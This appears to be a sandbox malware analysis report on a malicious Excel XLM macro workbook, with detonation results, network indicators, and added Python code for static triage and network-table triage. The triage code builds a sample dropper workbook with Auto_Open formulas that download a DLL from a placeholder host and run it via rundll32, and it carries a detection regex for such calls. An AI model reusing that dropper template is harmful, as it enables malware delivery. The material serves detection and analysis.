Malware Analysis Report

2025-03-15 07:23

Sample ID: 241111-zvm5bazkep
Target: bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615
SHA256: bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615
Tags: macro xlm discovery
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615

Threat Level: Known bad

The file bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615 was found to be: Known bad.

Malicious Activity Summary

Tags: macro xlm discovery

Signatures triggered across the static and behavioral analyses:

  Suspicious Office macro
  System Location Discovery: System Language Discovery
  Suspicious behavior: AddClipboardFormatListener
  Suspicious use of SetWindowsHookEx
  Checks processor information in registry
  Suspicious use of FindShellTrayWindow
  Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

T1614.001 System Location Discovery: System Language Discovery (behavioral1: EXCEL.EXE opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language)

Analysis: static1

Detonation Overview

Reported: 2024-11-11 21:02

Signatures

Suspicious Office macro (tags: macro xlm)

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
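The static1 signature says only that the workbook carries an Excel 4.0 (XLM) macro. The following is an added example (not part of the sandbox report and not the analyser's own code) of how that verdict is reached from the OOXML container: a part typed as a macrosheet in [Content_Types].xml, a sheet hidden from the UI, an Auto_Open defined name, and formulas that call EXEC/CALL/REGISTER. The analysed sample is not available here, so build_sample() constructs a minimal workbook with those parts; the download URL and file paths in it are placeholders, not indicators from this sample.

```python
# Added example (not from the sandbox report): static triage of an OOXML
# workbook for Excel 4.0 (XLM) macro content, the "macro xlm" signature above.
# The report's sample is not available here, so build_sample() constructs a
# minimal .xlsm in memory with the same parts an XLM dropper carries.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN}
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
CT_MACROSHEET = "application/vnd.ms-excel.macrosheet+xml"
# XLM calls worth flagging: process execution, dynamic imports, download, memory work.
RISKY = re.compile(r"\b(EXEC|CALL|REGISTER|FORMULA|URLDownloadToFile[AW]?|"
                   r"VirtualAlloc|WriteProcessMemory|CreateThread)\b", re.I)
AUTO_NAMES = {"_xlnm.auto_open", "auto_open", "_xlnm.auto_close", "auto_close"}


def triage_xlm(data: bytes) -> dict:
    """Return macrosheet parts, hidden sheets, Auto_* names and risky formulas found."""
    out = {"macrosheets": [], "hidden_sheets": [], "auto_names": [], "risky_calls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        # 1. A part typed as a macrosheet is Excel 4.0 code regardless of its sheet name.
        if "[Content_Types].xml" in names:
            for o in ET.fromstring(z.read("[Content_Types].xml")).iter(CT_NS + "Override"):
                if o.get("ContentType") == CT_MACROSHEET:
                    out["macrosheets"].append(o.get("PartName", "").lstrip("/"))
        # 2. Workbook: sheets hidden from the UI and names that run on open/close.
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(z.read("xl/workbook.xml"))
            for s in wb.iterfind(".//m:sheets/m:sheet", NS):
                if s.get("state") in ("hidden", "veryHidden"):
                    out["hidden_sheets"].append((s.get("name"), s.get("state")))
            for dn in wb.iterfind(".//m:definedNames/m:definedName", NS):
                if dn.get("name", "").lower() in AUTO_NAMES:
                    out["auto_names"].append((dn.get("name"), (dn.text or "").strip()))
        # 3. Walk macrosheet cells; formulas live in <c r="A1"><f>...</f></c>.
        for part in out["macrosheets"]:
            if part not in names:
                continue
            for c in ET.fromstring(z.read(part)).iterfind(".//m:c", NS):
                f = c.find("m:f", NS)
                if f is not None and f.text and RISKY.search(f.text):
                    out["risky_calls"].append((part, c.get("r"), f.text))
    return out


def verdict(findings: dict) -> str:
    """'xlm-dropper' when code, auto-execution and risky calls all coincide."""
    if findings["macrosheets"] and findings["auto_names"] and findings["risky_calls"]:
        return "xlm-dropper"
    if findings["macrosheets"]:
        return "xlm-present"
    return "no-xlm"


def build_sample() -> bytes:
    """Constructed workbook (not the analysed sample): veryHidden macrosheet + Auto_Open."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        f'<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{CT_MACROSHEET}"/>'
        "</Types>"
    )
    workbook = (
        f'<workbook xmlns="{MAIN}" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets>'
        '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName></definedNames>'
        "</workbook>"
    )
    # Placeholder URL and paths; not indicators from the analysed sample.
    macrosheet = (
        f'<xm:macrosheet xmlns="{MAIN}" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
        "<sheetData>"
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/x.dll","C:\\Users\\Public\\x.dll",0,0)</f></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("rundll32 C:\\Users\\Public\\x.dll,DllRegisterServer")</f></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f></c></row>'
        "</sheetData></xm:macrosheet>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    found = triage_xlm(build_sample())
    print(verdict(found), found)
```

The content-type check is the one that matters: renaming the sheet or moving the part does not change the declared type, and a workbook with no macrosheet part cannot carry XLM code. Hidden state and Auto_Open on their own are common in legitimate workbooks, which is why verdict() only escalates when all three indicators coincide.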

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-11 21:02
Reported: 2024-11-11 21:05
Platform: win7-20240903-en
Max time kernel: 143s
Max time network: 145s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm

Signatures

System Location Discovery: System Language Discovery (tags: discovery)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm

Network

Country Destination Domain Proto
US 8.8.8.8:53 buchhave.net udp
DK 94.231.103.182:80 buchhave.net tcp
US 8.8.8.8:53 www.bellaitaliatour.com udp
IT 86.105.14.13:443 www.bellaitaliatour.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 brainora.com udp
ES 217.76.142.114:80 brainora.com tcp
US 8.8.8.8:53 breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 www.breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 www.breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 biasikazan.hu udp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
US 8.8.8.8:53 beta.orlandofoodtours.com udp
US 66.115.130.163:80 beta.orlandofoodtours.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 bestsafe.co.uk udp
GB 185.151.30.164:80 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp

Files

memory/2120-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2120-1-0x000000007260D000-0x0000000072618000-memory.dmp

memory/2120-18-0x000000007260D000-0x0000000072618000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-11 21:02
Reported: 2024-11-11 21:05
Platform: win10v2004-20241007-en
Max time kernel: 128s
Max time network: 148s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm"

Signatures

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bb7118889cc36bfef1526b86531da8b4a70cc3827a20042582c2dc074a3d8615.xlsm"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 buchhave.net udp
DK 94.231.103.182:80 buchhave.net tcp
US 8.8.8.8:53 www.bellaitaliatour.com udp
IT 86.105.14.13:443 www.bellaitaliatour.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 182.103.231.94.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.14.105.86.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 brainora.com udp
ES 217.76.142.114:80 brainora.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 www.breustchabrierarchitectes.fr udp
FR 213.186.33.24:80 www.breustchabrierarchitectes.fr tcp
US 8.8.8.8:53 24.33.186.213.in-addr.arpa udp
US 8.8.8.8:53 biasikazan.hu udp
HU 5.56.35.6:443 biasikazan.hu tcp
US 8.8.8.8:53 beta.orlandofoodtours.com udp
US 66.115.130.163:80 beta.orlandofoodtours.com tcp
US 8.8.8.8:53 6.35.56.5.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 bestsafe.co.uk udp
GB 185.151.30.164:80 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 164.30.151.185.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 104.208.201.84.in-addr.arpa udp
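In both detonations the only process is EXCEL.EXE, and it contacts the same non-Microsoft hosts in the same order (buchhave.net, www.bellaitaliatour.com, brainora.com, breustchabrierarchitectes.fr, biasikazan.hu, beta.orlandofoodtours.com, bestsafe.co.uk) with no child process spawned afterwards, which is consistent with the macro walking a fixed list of download URLs. The registry and API signatures listed for the same process (CentralProcessor, BIOS, AddClipboardFormatListener, FindShellTrayWindow) are produced by Excel itself during normal startup and also appear when benign documents are opened, so the network table is the stronger evidence. The block below is an added example, not part of the report, that separates that evidence from the noise: resolver traffic to 8.8.8.8, the reverse-DNS (in-addr.arpa) queries the Windows 10 guest issues for every address it touches, and Office telemetry / CRL / OCSP hosts. The rows are excerpts copied from the behavioral1 and behavioral2 Network tables; the BENIGN_SUFFIXES list is this example's own assumption, not something the sandbox asserts.

```python
# Added example (not from the sandbox report): triage of the Network tables.
# Rows are excerpts of behavioral1/behavioral2 above; BENIGN_SUFFIXES is an assumption.
from collections import OrderedDict

BEHAVIORAL1 = """\
US 8.8.8.8:53 buchhave.net udp
DK 94.231.103.182:80 buchhave.net tcp
US 8.8.8.8:53 www.bellaitaliatour.com udp
IT 86.105.14.13:443 www.bellaitaliatour.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 biasikazan.hu udp
HU 5.56.35.6:443 biasikazan.hu tcp
HU 5.56.35.6:443 biasikazan.hu tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 bestsafe.co.uk udp
GB 185.151.30.164:80 bestsafe.co.uk tcp
GB 185.151.30.164:443 bestsafe.co.uk tcp
"""

BEHAVIORAL2 = """\
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 buchhave.net udp
DK 94.231.103.182:80 buchhave.net tcp
US 8.8.8.8:53 www.bellaitaliatour.com udp
IT 86.105.14.13:443 www.bellaitaliatour.com tcp
US 8.8.8.8:53 182.103.231.94.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 biasikazan.hu udp
HU 5.56.35.6:443 biasikazan.hu tcp
US 8.8.8.8:53 bestsafe.co.uk udp
GB 185.151.30.164:80 bestsafe.co.uk tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
"""

# Assumption: hosts an idle Office install talks to on its own (telemetry, CRL, OCSP).
BENIGN_SUFFIXES = (".microsoft.com", ".officeapps.live.com", ".lencr.org")


def parse_rows(table):
    """'CC ip:port domain proto' lines -> list of dicts; malformed lines are skipped."""
    rows = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto})
    return rows


def classify(row):
    """Bucket a row: resolver query, reverse-DNS noise, Office/CA noise, or candidate payload host."""
    if row["port"] == 53 and row["proto"] == "udp":
        return "reverse-dns" if row["domain"].endswith(".in-addr.arpa") else "dns-query"
    if row["domain"].endswith(BENIGN_SUFFIXES):
        return "benign"
    return "candidate"


def candidate_hosts(rows):
    """Candidate domain -> {ips, ports, country, hits}, keyed in first-contact order."""
    hosts = OrderedDict()
    for r in rows:
        if classify(r) != "candidate":
            continue
        h = hosts.setdefault(r["domain"], {"ips": set(), "ports": set(),
                                           "country": r["country"], "hits": 0})
        h["ips"].add(r["ip"])
        h["ports"].add(r["port"])
        h["hits"] += 1
    return hosts


def same_fetch_order(table_a, table_b):
    """True when both detonations reached the same candidate hosts in the same order,
    which points at a hard-coded URL list in the macro rather than a DGA."""
    return list(candidate_hosts(parse_rows(table_a))) == list(candidate_hosts(parse_rows(table_b)))


if __name__ == "__main__":
    for name, table in (("behavioral1", BEHAVIORAL1), ("behavioral2", BEHAVIORAL2)):
        print(name)
        for dom, h in candidate_hosts(parse_rows(table)).items():
            print(f"  {dom:28} {h['country']} {sorted(h['ips'])} ports={sorted(h['ports'])} hits={h['hits']}")
    print("same fetch order:", same_fetch_order(BEHAVIORAL1, BEHAVIORAL2))
```

Hosts that answer on both 80 and 443 with repeated hits (bestsafe.co.uk, biasikazan.hu) are the ones to pull from the pcap first, since a redirect to HTTPS followed by several connections is where a payload body, or its absence, will show. A domain that appears in both lists but was never actually fetched from would mean the macro moved on after a failed request, which is the behaviour a fixed fallback list produces.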

Files

memory/2268-1-0x00007FFB43F2D000-0x00007FFB43F2E000-memory.dmp

memory/2268-0-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-3-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-2-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-4-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-6-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-5-0x00007FFB03F10000-0x00007FFB03F20000-memory.dmp

memory/2268-8-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-10-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-9-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-7-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-12-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-11-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-13-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-14-0x00007FFB01C50000-0x00007FFB01C60000-memory.dmp

memory/2268-15-0x00007FFB01C50000-0x00007FFB01C60000-memory.dmp

memory/2268-33-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-34-0x00007FFB43F2D000-0x00007FFB43F2E000-memory.dmp

memory/2268-35-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

memory/2268-36-0x00007FFB43E90000-0x00007FFB44085000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5: 047ee9e8d54c778920df837ecc8d31f2
SHA1: 6d2262c49a9941837290e1fd17639e4eed7ea111
SHA256: 705f421fbf0a035e9e7e5eae68cb59c818cf47fc13d41fcee958a6fc3a5ba836
SHA512: 22b9142f7ca97a5f1689afb16755b1fc58a86acacde5906d640c27c1dd7786615f25ee45f3e2224f7d0ccd1a11a39de3826999f9f20b9a640370676843e4618e